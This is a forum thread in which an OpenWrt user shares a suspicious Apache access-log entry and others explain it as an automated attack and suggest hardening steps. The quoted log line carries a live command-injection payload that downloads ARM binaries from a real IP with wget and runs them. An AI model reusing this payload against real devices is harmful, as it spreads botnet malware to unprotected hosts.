Is this an hack attempt and can this mean a security problem

I run Openwrt 19.7.4 and I have installed apache as a webserver. Since the server is connected to the internet I saw a suspicious line in the acces_log of the server and I wonder if anyone could help me out in trying to understand the nature of the line and if it could imply that there has been some sort of damage to my installation or that some data have been stolen. The line is:

157.245.100.146 - - [27/Feb/2021:18:22:24 +0100] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/45.14.149.204/arm7;chmod+777+arm7;./arm7+jaws;wget+http:/\/45.14.149.204/arm;chmod+777+arm;./arm+jaws HTTP/1.1" 400 226

What worries me is the "GET /shell" and the "chmod+777".
Is there anyone who can clarify the content of this line?

That is indeed a hack attempt, but a proper configuration of apache should ignore it.

It would download and run additional software, which is (at least going by the name) targeted to a specific system with an ARM processor.

5 Likes

Without any protection (mod_security, fail2ban, reverse proxy, readonly filesystem,...?

1 Like

Looks like someone rented out or compromised a DigitalOcean server to attack people from. You can report this to them here.

Fun fact, the "ISP" that the IP belongs to is a "perfume shop" in Romania. If you go to that IP there's a script there that downloads a binary, executes it with dlink as the parameter and pipes the output to a file, then uploads it to 205.185.122.102 which is owned by a nasty "ISP" based in California. It tries to use curl to upload but it fails with Received HTTP/0.9 when not allowed.

3 Likes

Ok, thank you. As far as I can see there was no damage done to my installation. But you wrote that a proper configuration of Apache should ignore the attack. As a matter of fact I did not much configuration: after installation it was up and running. Could you be more specific on "proper configuration"?

It is best practice to post (potentially) malicious IP addresses with [.]'s for the delimiters and for links use hxxp:// instead of http://.

That won't do anything unless you have a CGI script at /shell in you web root.
It is likely targeting a specific vendor, that has such a script.

You will see hundreds of such attempts in your logs, that is just the Internet background noise.

Your "default configuration" which just serves static files should be OK.
Although I personally recommend against running a web (or any) server unless it is confined by SELinux and sandboxed by systemd.

1 Like

Honestly: yes, without any protection (mod_security, fail2ban, reverse proxy, readonly filesystem,...?)
I thought that if port 80 was the only way to access the server, Apache was able to stand against attacks. This may appear to you not very professional, but I'm just a simple user and I have seen no recommandations for extra security measures when I installed Apache. Maybe you can be a little more specific on the risks I take with none of the precautions you suggested?

Might be a good idea use something like a Raspberry Pi to run your web server. Separate hardware, no resource contention, you have more flexibility in distro choice (Debian/Ubuntu/etc). You can lock down the OS and web server in any way you like without touching your routers configuration. Makes it a bit easier to move your web server into a different subnet, choosing which hosts in your local network or outside your network are allowed to connect. Easier to do full block level backups, or just use some sort of CI/CD to deploy your web applications.

And if you get hacked, it's not necessarily an automatic game over because the bad guys have full unrestricted access to your router.

It's more work, but you'll sleep easier in the end.

3 Likes

Thank you. I looked up cUrl --which I did not know. It is probably a powerfull set of tools that could be misused.

Thanks. If you think I'm running the server on a ISP-router: no I don't; it is running OpenWRT on a separate Astoria VGV7519. I supposed that it could be used securely for serving only static page files. Maybe it is not.

I am not a Webserver security expert but generally for me any server that is open in the internet has a risk to be cracked (buffer overflow,...). But one of the security advices you seem to already have followed (running the Webserver on dedicated Hardware and not on same device as your firewall).

1 Like